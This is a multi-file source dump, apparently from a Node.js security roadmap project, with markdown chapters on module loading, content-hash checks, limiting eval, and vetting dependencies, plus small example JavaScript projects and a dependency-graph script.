192 | * Two different strategies for preventing abuse of
193 | [`eval`](what-about-eval.md).
194 | * JavaScript idioms that can allow many uses of `eval` to
195 | [load as modules](synthetic-modules.md) and to bundle as above.
196 | * Using JavaScript engine callbacks to
197 | [allow uses of `eval`](bounded-eval.md) by approved modules.
198 |
199 | [DEX]: ../chapter-1/threat-DEX.md
200 | [LQC]: ../chapter-1/threat-LQC.md
201 | [RCE]: ../chapter-1/threat-RCE.md
202 | [UIR]: ../chapter-1/threat-UIR.md
203 | [webpack]: https://webpack.js.org/
204 | [Symbol]: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Symbol
205 | [import-js]: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Statements/import
206 | [import-ts]: https://www.typescriptlang.org/docs/handbook/modules.html#import
207 | [Module._load]: https://github.com/nodejs/node/blob/0fdd88a374e23e1dd4a05d93afd5eb0c3b080fd5/lib/module.js#L449
208 | [FKS]: http://fredkschott.com/post/2014/06/require-and-the-module-system/
209 | [esm]: https://nodejs.org/api/esm.html#esm_ecmascript_modules
210 | [nodemon]: https://nodemon.io/
211 | [import-op-strawman]: https://github.com/tc39/proposal-dynamic-import
212 | [chroot jail]: https://help.ubuntu.com/community/BasicChroot
213 | [webpack-experiment]: https://github.com/google/node-sec-roadmap/tree/master/chapter-2/experiments/webpack-compat
214 |
--------------------------------------------------------------------------------
/chapter-2/example/.gitignore:
--------------------------------------------------------------------------------
1 | node_modules
2 |
--------------------------------------------------------------------------------
/chapter-2/example/graphs/filtered.dot:
--------------------------------------------------------------------------------
1 | digraph Modules {
2 | "./package.json" [fillcolor=black,fontcolor=white,style=filled];
3 | "./index.js" -> "./lib/static.js";
4 | "./index.js" -> "./lib/dynamic.js";
5 | "./index.js" -> "./lib/opt2.js";
6 | "./index.js" -> "./lib/lazy.js";
7 | "./package.json" -> "./index.js";
8 | }
9 |
--------------------------------------------------------------------------------
/chapter-2/example/graphs/filtered.svg:
--------------------------------------------------------------------------------
1 |
2 |
4 |
6 |
7 |
80 |
--------------------------------------------------------------------------------
/chapter-2/example/index.js:
--------------------------------------------------------------------------------
1 | /**
2 | * @license
3 | * Copyright 2017 Google LLC
4 | *
5 | * Licensed under the Apache License, Version 2.0 (the "License");
6 | * you may not use this file except in compliance with the License.
7 | * You may obtain a copy of the License at
8 | *
9 | * https://www.apache.org/licenses/LICENSE-2.0
10 | *
11 | * Unless required by applicable law or agreed to in writing, software
12 | * distributed under the License is distributed on an "AS IS" BASIS,
13 | * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
14 | * See the License for the specific language governing permissions and
15 | * limitations under the License.
16 | */
17 |
18 | // index.js
19 | // Example that tests various kinds of loads.
20 |
21 | let staticLoad = require('./lib/static');
22 | function dynamicLoad(f, x) {
23 | return f('./lib/' + x);
24 | }
25 | dynamicLoad(require, Math.random() < 2 ? 'dynamic' : 'bogus');
26 | exports.lazyLoad = () => require('./lib/lazy');
27 |
28 | // Fallback to alternatives
29 | require(['./lib/opt1', './lib/opt2'].find(
30 | (name) => {
31 | try {
32 | require.resolve(name);
33 | return true;
34 | } catch (_) {
35 | return false;
36 | }
37 | }));
38 |
--------------------------------------------------------------------------------
/chapter-2/example/lib/dynamic.js:
--------------------------------------------------------------------------------
1 | /**
2 | * @license
3 | * Copyright 2017 Google LLC
4 | *
5 | * Licensed under the Apache License, Version 2.0 (the "License");
6 | * you may not use this file except in compliance with the License.
7 | * You may obtain a copy of the License at
8 | *
9 | * https://www.apache.org/licenses/LICENSE-2.0
10 | *
11 | * Unless required by applicable law or agreed to in writing, software
12 | * distributed under the License is distributed on an "AS IS" BASIS,
13 | * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
14 | * See the License for the specific language governing permissions and
15 | * limitations under the License.
16 | */
17 |
18 | // lib/dynamic.js
19 |
20 | exports.x = 'dynamic';
21 |
--------------------------------------------------------------------------------
/chapter-2/example/lib/lazy.js:
--------------------------------------------------------------------------------
1 | /**
2 | * @license
3 | * Copyright 2017 Google LLC
4 | *
5 | * Licensed under the Apache License, Version 2.0 (the "License");
6 | * you may not use this file except in compliance with the License.
7 | * You may obtain a copy of the License at
8 | *
9 | * https://www.apache.org/licenses/LICENSE-2.0
10 | *
11 | * Unless required by applicable law or agreed to in writing, software
12 | * distributed under the License is distributed on an "AS IS" BASIS,
13 | * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
14 | * See the License for the specific language governing permissions and
15 | * limitations under the License.
16 | */
17 |
18 | // lib/lazy.js
19 |
20 | exports.x = 'lazy';
21 |
--------------------------------------------------------------------------------
/chapter-2/example/lib/opt2.js:
--------------------------------------------------------------------------------
1 | /**
2 | * @license
3 | * Copyright 2017 Google LLC
4 | *
5 | * Licensed under the Apache License, Version 2.0 (the "License");
6 | * you may not use this file except in compliance with the License.
7 | * You may obtain a copy of the License at
8 | *
9 | * https://www.apache.org/licenses/LICENSE-2.0
10 | *
11 | * Unless required by applicable law or agreed to in writing, software
12 | * distributed under the License is distributed on an "AS IS" BASIS,
13 | * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
14 | * See the License for the specific language governing permissions and
15 | * limitations under the License.
16 | */
17 |
18 | // lib/opt2.js
19 |
20 | exports.x = 'opt2';
21 |
--------------------------------------------------------------------------------
/chapter-2/example/lib/static.js:
--------------------------------------------------------------------------------
1 | /**
2 | * @license
3 | * Copyright 2017 Google LLC
4 | *
5 | * Licensed under the Apache License, Version 2.0 (the "License");
6 | * you may not use this file except in compliance with the License.
7 | * You may obtain a copy of the License at
8 | *
9 | * https://www.apache.org/licenses/LICENSE-2.0
10 | *
11 | * Unless required by applicable law or agreed to in writing, software
12 | * distributed under the License is distributed on an "AS IS" BASIS,
13 | * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
14 | * See the License for the specific language governing permissions and
15 | * limitations under the License.
16 | */
17 |
18 | // lib/static.js
19 |
20 | exports.x = 'static';
21 |
--------------------------------------------------------------------------------
/chapter-2/example/make_dep_graph.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # Copyright 2017 Google LLC
4 | #
5 | # Licensed under the Apache License, Version 2.0 (the "License");
6 | # you may not use this file except in compliance with the License.
7 | # You may obtain a copy of the License at
8 | #
9 | # https://www.apache.org/licenses/LICENSE-2.0
10 | #
11 | # Unless required by applicable law or agreed to in writing, software
12 | # distributed under the License is distributed on an "AS IS" BASIS,
13 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
14 | # See the License for the specific language governing permissions and
15 | # limitations under the License.
16 |
17 | set -e
18 |
19 | cd "$(dirname "$0")"
20 |
21 | mkdir -p graphs
22 | (
23 | echo 'digraph Modules {'
24 |
25 | # Run the tests and filter the logs for log entries from our
26 | # hacked Module._load.
27 | # Also relativize source file paths.
28 | NODE=/Users/msamuel/work/node/out/Release/node \
29 | PATH="/Users/msamuel/work/node/out/Release/:$PATH" \
30 | ./node_modules/.bin/mocha 2>&1 \
31 | | perl -ne 's/"$ENV{PWD}/"./g; if (s/^REQUIRE_LOG_DOT://) { print $_; } else { print STDERR $_; }'
32 |
33 | # Add an edge from package.json to the main module.
34 | echo ' "./package.json" -> "./index.js";'
35 | echo ' "./package.json" [fillcolor=black,fontcolor=white,style=filled];'
36 | echo '}'
37 | ) > graphs/full.dot
38 |
39 | python -c '
40 | import re
41 | import sys
42 | # Copy the dot graph on stdin to stdout, keeping only edges reachable from package.json.
43 | EDGE_RE = re.compile(r"""^ *(\"(?:[^\"\\]|\\.)*\") -> (\"(?:[^\"\\]|\\.)*\");$""")
44 | GRAPH_END_RE = re.compile(r"^ *\}")
45 | # Adjacency lists keyed by the quoted source node name.
46 | edges = {}
47 | def add_edge(src, tgt):
48 |     tgts = edges.get(src)
49 |     if tgts is None:
50 |         tgts = []
51 |         edges[src] = tgts
52 |     tgts.append(tgt)
53 | # Edge lines are buffered; every other line is echoed as soon as it is read.
54 | for line in sys.stdin:
55 |     edges_match = EDGE_RE.match(line)
56 |     if edges_match is not None:
57 |         add_edge(edges_match.group(1), edges_match.group(2))
58 |         continue
59 |     elif GRAPH_END_RE.match(line):  # Closing brace: emit the surviving edges before it.
60 |         reachable = set()
61 |         def find_reachable(src):
62 |             if src not in reachable:
63 |                 reachable.add(src)
64 |                 for tgt in edges.get(src, ()):
65 |                     find_reachable(tgt)
66 |         find_reachable("\"./package.json\"")  # Start walking from package.json.
67 |         reachable = list(reachable)
68 |         reachable.sort()  # Sorted so the output is deterministic.
69 |         for src in reachable:
70 |             for tgt in edges.get(src, ()):
71 |                 sys.stdout.write(" %s -> %s;\n" % (src, tgt))  # write, not print: runs on Python 2 and 3.
72 |     sys.stdout.write(line)  # The line keeps its own trailing newline.
73 | ' < graphs/full.dot > graphs/filtered.dot
74 |
75 | for graph in full filtered; do
76 | dot -Tsvg graphs/"$graph".dot > graphs/"$graph".svg
77 | done
78 |
79 | # Start walking from package.json
80 |
81 |
--------------------------------------------------------------------------------
/chapter-2/example/package.json:
--------------------------------------------------------------------------------
1 | {
2 | "name": "dynamism-example",
3 | "private": true,
4 | "description": "Example code that shows dynamically walking the test graph",
5 | "main": "index.js",
6 | "scripts": {
7 | "test": "echo $NODE; ./node_modules/.bin/mocha"
8 | },
9 | "author": "Mike Samuel",
10 | "license": "Apache-2.0",
11 | "devDependencies": {
12 | "chai": ">=4.1.2",
13 | "mocha": ">=4.0.1"
14 | }
15 | }
16 |
--------------------------------------------------------------------------------
/chapter-2/example/test/test.js:
--------------------------------------------------------------------------------
1 | /**
2 | * @license
3 | * Copyright 2017 Google LLC
4 | *
5 | * Licensed under the Apache License, Version 2.0 (the "License");
6 | * you may not use this file except in compliance with the License.
7 | * You may obtain a copy of the License at
8 | *
9 | * https://www.apache.org/licenses/LICENSE-2.0
10 | *
11 | * Unless required by applicable law or agreed to in writing, software
12 | * distributed under the License is distributed on an "AS IS" BASIS,
13 | * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
14 | * See the License for the specific language governing permissions and
15 | * limitations under the License.
16 | */
17 |
18 | // test/test.js
19 |
20 | var expect = require("chai").expect;
21 | var app = require("../index");
22 |
23 | describe("My TestSuite", () => {
24 | describe("A test", () => {
25 | it("A unittest", () => {
26 | // Exercise the API
27 | app.lazyLoad();
28 | });
29 | });
30 | });
31 |
--------------------------------------------------------------------------------
/chapter-2/experiments/webpack-compat/.gitignore:
--------------------------------------------------------------------------------
1 | dist
2 | node_modules
--------------------------------------------------------------------------------
/chapter-2/experiments/webpack-compat/goodbye.js:
--------------------------------------------------------------------------------
1 | /**
2 | * @license
3 | * Copyright 2017 Google LLC
4 | *
5 | * Licensed under the Apache License, Version 2.0 (the "License");
6 | * you may not use this file except in compliance with the License.
7 | * You may obtain a copy of the License at
8 | *
9 | * https://www.apache.org/licenses/LICENSE-2.0
10 | *
11 | * Unless required by applicable law or agreed to in writing, software
12 | * distributed under the License is distributed on an "AS IS" BASIS,
13 | * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
14 | * See the License for the specific language governing permissions and
15 | * limitations under the License.
16 | */
17 |
18 | exports.say = x => console.log(`Goodbye, ${x}!`);
19 |
--------------------------------------------------------------------------------
/chapter-2/experiments/webpack-compat/hello.js:
--------------------------------------------------------------------------------
1 | /**
2 | * @license
3 | * Copyright 2017 Google LLC
4 | *
5 | * Licensed under the Apache License, Version 2.0 (the "License");
6 | * you may not use this file except in compliance with the License.
7 | * You may obtain a copy of the License at
8 | *
9 | * https://www.apache.org/licenses/LICENSE-2.0
10 | *
11 | * Unless required by applicable law or agreed to in writing, software
12 | * distributed under the License is distributed on an "AS IS" BASIS,
13 | * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
14 | * See the License for the specific language governing permissions and
15 | * limitations under the License.
16 | */
17 |
18 | exports.say = x => console.log(`Hello, ${x}!`);
19 |
--------------------------------------------------------------------------------
/chapter-2/experiments/webpack-compat/index.js:
--------------------------------------------------------------------------------
1 | /**
2 | * @license
3 | * Copyright 2017 Google LLC
4 | *
5 | * Licensed under the Apache License, Version 2.0 (the "License");
6 | * you may not use this file except in compliance with the License.
7 | * You may obtain a copy of the License at
8 | *
9 | * https://www.apache.org/licenses/LICENSE-2.0
10 | *
11 | * Unless required by applicable law or agreed to in writing, software
12 | * distributed under the License is distributed on an "AS IS" BASIS,
13 | * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
14 | * See the License for the specific language governing permissions and
15 | * limitations under the License.
16 | */
17 |
18 | var metadata = require('./package.json');
19 | var greeting = require('./' + metadata.greeting);
20 |
21 | greeting.say('World');
22 |
--------------------------------------------------------------------------------
/chapter-2/experiments/webpack-compat/package.json:
--------------------------------------------------------------------------------
1 | {
2 | "name": "webpack-compat-experiment",
3 | "description": "Figuring out how well webpack deals with dynamic loads",
4 | "version": "0.0.0",
5 | "main": "index.js",
6 | "dependencies": {},
7 | "scripts": {},
8 | "author": "Mike Samuel",
9 | "license": "Apache-2.0",
10 | "greeting": "hello",
11 | "devDependencies": {
12 | "webpack": "^3.10.0"
13 | }
14 | }
15 |
--------------------------------------------------------------------------------
/chapter-2/experiments/webpack-compat/test-utils.js:
--------------------------------------------------------------------------------
1 | /**
2 | * @license
3 | * Copyright 2017 Google LLC
4 | *
5 | * Licensed under the Apache License, Version 2.0 (the "License");
6 | * you may not use this file except in compliance with the License.
7 | * You may obtain a copy of the License at
8 | *
9 | * https://www.apache.org/licenses/LICENSE-2.0
10 | *
11 | * Unless required by applicable law or agreed to in writing, software
12 | * distributed under the License is distributed on an "AS IS" BASIS,
13 | * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
14 | * See the License for the specific language governing permissions and
15 | * limitations under the License.
16 | */
17 |
18 | exports.doSomethingScaryButItsOkInTest = function() {
19 | throw new Error('test-utils.js: NOT PRODUCTION CODE');
20 | };
21 |
--------------------------------------------------------------------------------
/chapter-2/experiments/webpack-compat/test.sh:
--------------------------------------------------------------------------------
1 | echo <&1 | grep -q 'Hello, World!'; then
43 | echo 'Ran ok'
44 | else
45 | echo 'Failed to bundle dependency'
46 | fi
47 |
48 | echo
49 | echo Looking for non production code
50 | if grep -Hn 'NOT PRODUCTION CODE' dist/bundle.js; then
51 | echo 'Webpack bundled test code in its minimal configuration'
52 | false
53 | fi
54 |
55 | # */
56 |
--------------------------------------------------------------------------------
/chapter-2/experiments/webpack-compat/test/test.js:
--------------------------------------------------------------------------------
1 | /**
2 | * @license
3 | * Copyright 2017 Google LLC
4 | *
5 | * Licensed under the Apache License, Version 2.0 (the "License");
6 | * you may not use this file except in compliance with the License.
7 | * You may obtain a copy of the License at
8 | *
9 | * https://www.apache.org/licenses/LICENSE-2.0
10 | *
11 | * Unless required by applicable law or agreed to in writing, software
12 | * distributed under the License is distributed on an "AS IS" BASIS,
13 | * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
14 | * See the License for the specific language governing permissions and
15 | * limitations under the License.
16 | */
17 |
18 | console.log('test/test.js: NOT PRODUCTION CODE');
19 |
--------------------------------------------------------------------------------
/chapter-2/experiments/webpack-compat/webpack.config.js:
--------------------------------------------------------------------------------
1 | const path = require('path');
2 |
3 | module.exports = {
4 | output: {
5 | path: path.resolve('./dist'),
6 | filename: 'bundle.js',
7 | },
8 | entry: path.resolve('./index.js')
9 | };
10 |
--------------------------------------------------------------------------------
/chapter-2/source-contents.md:
--------------------------------------------------------------------------------
1 | # Source Content Checks
2 |
3 | The node runtime's module loader uses the `_compile` method to actually
4 | turn file content into code thus:
5 |
6 | ```js
7 | // Run the file contents in the correct scope or sandbox. Expose
8 | // the correct helper variables (require, module, exports) to
9 | // the file.
10 | // Returns exception, if any.
11 | Module.prototype._compile = function(content, filename) {
12 | content = internalModule.stripShebang(content);
13 |
14 | // create wrapper function
15 | var wrapper = Module.wrap(content);
16 |
17 | var compiledWrapper = vm.runInThisContext(wrapper, {
18 | ```
19 |
20 | At the top of that method body, we can check that the content
21 | is on a list of production sources.
22 |
23 | The entire process looks like:
24 |
25 | 1. Developer develops and tests their app iteratively as normal.
26 | 2. The developer generates a list of production sources via the
27 | dynamic bundling scheme outlined earlier, a static tool like
28 | webpack, or some combination.
29 | 3. The bundling tool generates a file with a cryptographic hash
30 | for each production source.
31 | We prefer hashing to checking paths for reasons that will become
32 | apparent later when we discuss `eval`.
33 | 4. A deploy script copies the bundle and the hashes to a production server.
34 | 5. The server startup script passes a flag to `node` or `npm start`
35 | telling the runtime where to look for the production source hashes.
36 | 6. The runtime reads the hashes and combines them with any hashes necessary
37 | to whitelist any `node` internal JavaScript files that might load
38 | via `require`.
39 | 7. When a call to `require(x)` reaches `Module.prototype._compile`
40 | it hashes `content` and checks that the hash is in the allowed set.
41 | If not, it logs that and, if not in report-only-mode,
42 | raises an exception.
43 | 8. Normal log collecting and monitoring communicates failures
44 | to the development team.
45 |
46 | This is similar to [Content-Security-Policy (CSP)][csp] but for
47 | server-side code. Like CSP, there is an intermediate step that might
48 | be useful between no enforcement and full enforcement:
49 | [report only mode][].
50 |
51 | [CSP]: https://developers.google.com/web/fundamentals/security/csp/
52 | [report only mode]: https://developers.google.com/web/fundamentals/security/csp/#report-only
53 |
--------------------------------------------------------------------------------
/chapter-2/synthetic-modules.md:
--------------------------------------------------------------------------------
1 | # Statically eliminating `eval`
2 |
3 | Pug provides a flexible API to load Pug templates from `.pug` files
4 | that `eval`s the generated code ([code][pug-eval]),
5 | and a command line interface for precompiling Pug files.
6 |
7 | Let's ignore those and imagine ways to allow a Pug user to
8 | compile a Pug template that makes the static nature apparent
9 | even to an analysis which doesn't make assumptions about the
10 | contents of `.pug` files.
11 |
12 | ```js
13 | const pug = require('pug');
14 |
15 | exports.myTemplate = pug.lang`
16 | doctype html
17 | html
18 | head
19 | ...`;
20 | ```
21 |
22 | This code snippet uses a [tagged template literal][] to allow Pug
23 | template code to appear inline in a JavaScript file.
24 |
25 | Rather than loading a `.pug` file, we have declared it in JavaScript.
26 |
27 | Imagine further that `pug.lang` runs the compiler, but instead of
28 | using `new Function(...)` it uses some new module API
29 |
30 | ```js
31 | require.synthesize(generatedCode)
32 | ```
33 |
34 | which could manufacture a `Module` instance with the generated code and
35 | install the module into the cache with the input hash as its filename.
36 |
37 | When [bundling](bundling.md), we could dump the content of synthesized
38 | modules, and, when the bundle loads in production, pre-populate
39 | the module cache. When the `pug.lang` implementation asks the
40 | module loader to create a module with the content between
41 | `...` it would find a resolved module ready but not
42 | loaded. If a module is already in the cache, `Module` skips the
43 | additional content checks.
44 |
45 | The Node runtime function, `makeRequireFunction`
46 | ([code][makeRequireFunction]), defines a `require` for each module
47 | that loads modules with the current module as the parent. That would
48 | also have to define a module specific `require.synthesize` that does
49 | something like:
50 |
51 | ```js
52 | function synthesize(content) {
53 | content = String(content);
54 | // Hashing gives us a stable identifier so that we can associate
55 | // code inlined during bundling with that loaded in production.
56 | const hash = crypto
57 | .createHash('sha512')
58 | .update(content, 'utf8')
59 | .digest();
60 | // A name that communicates the source while being
61 | // unambiguous with any actual file.
62 | const filename = '/dev/null/synthetic/' + hash;
63 | // We scope the identifier so that it is clear in
64 | // debugging trace that the module is synthetic and
65 | // to avoid leading existing tools to conclude that
66 | // it is available via registry.npmjs.org.
67 | const id = '@node-internal-synthetic/' + hash;
68 | const cache = Module._cache;
69 | let syntheticModule = cache[filename];
70 | if (syntheticModule) {
71 | // TODO: updateChildren(mod, syntheticModule, true);
72 | } else {
73 | cache[filename] = syntheticModule = new Module(id, mod);
74 | syntheticModule.loaded = true;
75 | syntheticModule._compile(content, filename);
76 | }
77 | // TODO: dump the module if the command line flags specify
78 | // a synthetic_node_modules/ output directory.
79 | return syntheticModule;
80 | }
81 |
82 | require.synthesize = synthesize;
83 | ```
84 |
85 | Static analysis tools often benefit from having a whole program
86 | available. Humans can reason about external files, like `.pug` files,
87 | but static analysis tools often have to be unsound, or assume the
88 | worst. Synthetic modules may provide a way to move a large chunk of
89 | previously unanalyzable code into the domain of what static analysis
90 | tools can check.
91 |
92 | This scheme might be more discoverable if code generator authors
93 | adopted some conventions:
94 |
95 | * If a module defines `exports.lang` it should be usable as a
96 | template tag.
97 | * If that same function is called with an option map instead
98 | of as a template tag function, then it should return a function
99 | to enable usages like
100 | ```js
101 | pug.lang(myPugOptionMap)`
102 | doctype html
103 | ...`
104 | ```
105 | * If the first line starts with some whitespace, all subsequent
106 | lines have that same whitespace as a prefix, and the language
107 | is whitespace-sensitive, then strip it before processing.
108 | This would allow indenting inline DSLs within a larger
109 | JavaScript program.
110 |
111 | We discuss template tag usability concerns in more detail later when
112 | discussing [library tweaks][library].
113 |
114 | This proposal has one major drawback: we still have to trust the code
115 | generator. Pug's code generator looks well structured, but reasoning
116 | about all the code produced by a code generator is harder than
117 | reasoning about one hand-written module. The [frozen realms][] proposal
118 | restricts code to a provided API like
119 | `vm.runInNewContext` aimed to. If Pug, for example, chose to load its
120 | code in a sandbox, then checking just the provided context would give
121 | us confidence about what generated code could do. In some cases, we
122 | might be able to move the code generator outside the
123 | [*trusted computing base*][TCB].
124 |
125 | [tagged template literal]: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Template_literals#Tagged_template_literals
126 | [pug-eval]: https://github.com/pugjs/pug/blob/926f7c720112cac76cfedb003e25e9f43d3a1767/packages/pug/lib/index.js#L261-L263
127 | [library]: ../chapter-7/libraries.md
128 | [makeRequireFunction]: https://github.com/nodejs/node/blob/8f5040771475ca5435b6cb78ab2ebce7447afcc1/lib/internal/module.js#L5
129 | [frozen realms]: https://github.com/tc39/proposal-frozen-realms
130 | [TCB]: https://en.wikipedia.org/wiki/Trusted_computing_base
131 |
--------------------------------------------------------------------------------
/chapter-2/what-about-eval.md:
--------------------------------------------------------------------------------
1 | # What about `eval`?
2 |
3 | Previously we've talked about how to control what code loads
4 | from the file system, but not what code loads from strings.
5 |
6 | The rest of this discussion uses the term "`eval`" to refer to any of
7 | the `eval` operator, the `eval` function, `new Function`,
8 | `vm.runIn*Context`, `vm.Script.run*`, [`WebAssembly.compile`][]
9 | and other operators that convert strings or bytes into code.
10 |
11 | Recall that it is difficult to prove that code
12 | [does not `eval`](../chapter-1/threat-RCE.md):
13 |
14 | ```js
15 | var x = {},
16 | a = 'constructor',
17 | b = 'constructor',
18 | s = 'console.log(s)';
19 | x[a][b](s)();
20 | ```
21 |
22 | Some node projects deploy with a tweaked node runtime that turns off
23 | some `eval` operators, but there are widely used npm modules that use
24 | them carefully. For example:
25 |
26 | * [Pug][] generates HTML from templates.
27 | * [Mathjs][] evaluates closed-form mathematical expressions.
28 |
29 | Both generate JavaScript code under the hood, which is dynamically
30 | parsed. Let's consider two use cases:
31 |
32 | * Pug's code generator is usually called with trusted inputs, e.g.
33 | `.pug` files authored by trusted developers.
34 | * Mathjs is often called with untrusted inputs. If a developer
35 | wanted to let a user generate an ad-hoc report without having to
36 | download data into a spreadsheet, they might use Mathjs to parse
37 | user-supplied arithmetic expressions ([docs][more_secure_eval])
38 | instead of trying to check that an input is safe to `eval` via
39 | `RegExp`s. It is not without risk ([advisory][adv552])
40 | though [^1].
41 |
42 | These two uses of code generators fall at either end of a spectrum.
43 | The uses of Pug seem static, all the information is available before
44 | we deploy. Our Mathjs use case is necessarily dynamic since the
45 | input is not available until a user is in the loop.
46 |
47 | Next we discuss ways to recognize and simplify the former, while
48 | double-checking the latter. On the client, we have no options between
49 | allowing implicit `eval` and banning all uses of `eval`. There are
50 | fewer compelling use cases on the client since it is harder to
51 | amortize code generation over multiple requests. On the server, use
52 | of `eval` in the presence of untrusted inputs still needs to be
53 | carefully vetted. We explore ways to programmatically enforce vetting
54 | decisions short of a blanket ban, but turning off `eval` before
55 | accepting untrusted inputs is still the most reliable way to prevent
56 | attackers from using `eval` against you.
57 |
58 | [^1]: Since this writing, [Mathjs got rid of all uses of `eval`][no-eval-issue]
59 |
60 |
61 | [`WebAssembly.compile`]: http://webassembly.org/docs/js/#webassemblycompile
62 | [Pug]: https://pugjs.org/
63 | [Mathjs]: http://mathjs.org/
64 | [more_secure_eval]: http://mathjs.org/examples/advanced/more_secure_eval.js.html
65 | [adv552]: https://nodesecurity.io/advisories/552
66 | [no-eval-issue]: https://github.com/josdejong/mathjs/issues/1019#issuecomment-367289278
67 |
--------------------------------------------------------------------------------
/chapter-3/knowing_dependencies.md:
--------------------------------------------------------------------------------
1 | # Knowing your dependencies
2 |
3 | ## Background
4 |
5 | [`npmjs` search results][npmjs/node] have stats on download count and
6 | open issues and PRs.
7 |
8 |
9 |
10 | Each package page also links to the corresponding GitHub project
11 | which has links to the project's [pulse][github-pulse].
12 |
13 | Both of these give an idea of how popular the project is, and
14 | whether it's actively developed.
15 |
16 | On their Github pages, many projects proudly display
17 | [badges and shields][] indicating their continuous integration status,
18 | and other vital statistics.
19 |
20 | The Linux Core Infrastructure project espouses a set of
21 | [best practices badges][bpb] and defines tiers for mature infrastructure
22 | projects. We get some of the basic items for free by distributing via
23 | `npm`, but other items bear on how responsive the project might be to
24 | vulnerability reports and how it might respond to attempts to inject
25 | malicious code:
26 |
27 | * Another will have the necessary access rights if someone dies
28 | * Monitor external dependencies to detect/fix known vulnerabilities
29 | * At least 2 unassociated significant contributors
30 | * Use 2FA
31 | * At least 50% of all modifications are reviewed by another
32 | * Have a security review (internal or external)
33 |
34 | "Use 2FA" is possible with npm but it is not clear that it is widely
35 | practiced. [MTP][] discusses the support already built into Github
36 | and `npm profile`.
37 |
38 |
39 | ## Problem
40 |
41 | Threats: [LQC][] [MTP][]
42 |
43 | The npm repository, like other open-source code repositories,
44 | contains mature and well-maintained modules, but also plenty of
45 | bleeding-edge code that has not yet had bugs ironed out.
46 |
47 | A wise technical lead might decide that they can use third-party
48 | dependencies that have been widely used in production for several
49 | years by projects with similar needs since gross errors are likely
50 | to have been fixed.
51 |
52 | That technical lead might also decide that they can use bleeding edge
53 | code when they have enough local expertise to vet it, identify
54 | corner-cases they need to check, and fix any gross errors they
55 | encounter.
56 |
57 | Either way, that decision to use bleeding-edge code or code that might
58 | not be maintained over the long term should be a conscious one.
59 |
60 |
61 | ## Success Criteria
62 |
63 | Development teams are rarely surprised when code that they had built a
64 | prototype on later turns out not to be ready for production use, and
65 | they do not have to pore over others' code to vet many dependencies.
66 |
67 | ## A Possible Solution
68 |
69 | The building blocks of a solution probably already exist.
70 |
71 | ### Aggregate more signals
72 |
73 | `npmjs.com` may or may not be the right place to do this, but we
74 | should, as a community, aggregate signals about modules and make
75 | them readily available.
76 |
77 | `npmjs.com/package` already aggregates some useful signals, but
78 | it or another forum could aggregate more including
79 |
80 | - More of the GitHub pulse information including
81 | closed issues, PRs over time.
82 | - Relevant badges & shields for the project itself.
83 | - Relevant badges & shields by percentage of transitive
84 | dependencies and peer dependencies that have them.
85 | - Support channels, e.g. slack & discord.
86 | - Vulnerability reports and the version they affect.
87 | See sources in ["When all else fails"][failing]
88 | - Weighted mean of age of production dependencies transitively.
89 | - Results of linters (see [oversight][]) run without respecting
90 | [inline ignore comments][eslint-ignore-line] and
91 | [file ignore directives][eslint-ignore-file].
92 |
93 | Users deciding whether to buy something from an online store or
94 | download a cellphone app from an app store have reviews
95 | and comments from other users. That members of the community take
96 | time to weigh in can be a useful signal, and the details can help
97 | clarify whether this module or an alternative might be better for a
98 | specific use.
99 |
100 | Large organizations who host [internal replicas][] may already have a
101 | lot of the opinion available internally, but aggregating that across
102 | clients can help smaller organizations and large organizations
103 | that are debating whether to dip their toe in.
104 |
105 |
106 | ### Leadership & Developer outreach
107 |
108 | The node runtime already [passes][CI-node] the Linux Foundation's best
109 | practices criteria, but could lead the way by explaining how a project
110 | that pushes from GitHub to `registry.npmjs.org` can pass more of these
111 | criteria.
112 |
113 |
114 | [npmjs/node]: https://www.npmjs.com/package/node
115 | [github-pulse]: https://github.com/blog/1476-get-up-to-speed-with-pulse
116 | [badges and shields]: https://github.com/badges/shields
117 | [bpb]: https://github.com/coreinfrastructure/best-practices-badge
118 | [internal replicas]: ../chapter-4/close_dependencies.md
119 | [failing]: ../chapter-6/failing.md
120 | [CRY]: ../chapter-1/threat-CRY.md
121 | [LQC]: ../chapter-1/threat-LQC.md
122 | [MTP]: ../chapter-1/threat-MTP.md
123 | [oversight]: ../chapter-5/oversight.md
124 | [eslint-ignore-line]: https://eslint.org/docs/user-guide/configuring#disabling-rules-with-inline-comments
125 | [eslint-ignore-file]: https://eslint.org/docs/user-guide/configuring#ignoring-files-and-directories
126 | [CI-node]: https://bestpractices.coreinfrastructure.org/projects?gteq=50&q=Node.js
127 |
--------------------------------------------------------------------------------
/chapter-5/oversight.md:
--------------------------------------------------------------------------------
1 | # Oversight
2 |
3 |
4 | ## Problem
5 |
6 | Threats: [BOF][] [CRY][] [DEX][] [EXF][] [LQC][] [QUI][] [RCE][] [SHP][]
7 |
8 | Manually reviewing third party modules for known security problems
9 | is time consuming.
10 |
11 | Having developers wait for such review unnecessarily slows down
12 | development.
13 |
14 | Our engineering processes ought not force us to choose between
15 | forgoing sanity checks and shipping code in a timely manner.
16 |
17 |
18 | ## Background
19 |
20 | [JSConformance][] allows a project team to specify a policy for
21 | Closure JavaScript. This policy can encode lessons learned about APIs
22 | that are prone to misuse. By taking into account type information
23 | about arguments and `this`-values it can distinguish problematic
24 | patterns like `setTimeout(aString, dt)` from unproblematic ones
25 | `setTimeout(aFunction, dt)`.
26 |
27 | [TSLint][tslint] and [ESLint][eslint] both allow custom rules so can
28 | be extended as a project or developer community identifies Good and
29 | Bad parts of JavaScript for their particular context.
30 |
31 |
32 |
33 | ## A possible solution
34 |
